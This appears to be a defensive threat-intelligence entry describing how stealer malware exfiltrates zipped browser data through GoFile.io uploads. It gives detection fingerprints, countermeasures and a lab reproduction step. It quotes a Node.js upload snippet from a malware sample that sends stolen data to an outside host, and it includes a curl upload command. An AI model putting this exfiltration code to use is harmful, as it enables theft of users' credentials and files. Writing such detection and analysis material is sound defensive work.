GoFile.io Exfiltration
Malware exfiltrates stolen data by uploading ZIP archives to GoFile.io, a free file-hosting service that requires no authentication. The uploaded files are then shared with the operator via the returned download URL, often relayed through Discord webhook or Telegram Bot API messages.
Detection / Fingerprint
- HTTP POST requests to
*.gofile.io/uploadFile Content-Type: multipart/form-datawithfilefield- Response parsing for
.data.downloadUrlor.data.link - Node.js
form-datamodule usage alongsideaxios.post
Implementation Patterns Observed
In novashadow stolen browser data is compressed into a ZIP (via adm-zip), then uploaded via:
const form = new FormData();
form.append('file', fs.createReadStream(zipPath));
const res = await axios.post(`https://${server}.gofile.io/uploadFile`, form, { headers: form.getHeaders() });
const downloadUrl = res.data.data.downloadUrl;
Reproduce on Your Own VMs
- Create a test ZIP file
- Upload via curl:
curl -F "file=@test.zip" https://store1.gofile.io/uploadFile - Extract the
downloadUrlfrom the JSON response
Defensive Countermeasures
- Block
*.gofile.ioat the proxy/firewall layer - Alert on
multipart/form-datauploads from Node.js processes - Hunt for processes writing
BrowserData.zipor*_cookies.zipto%TEMP%followed by network uploads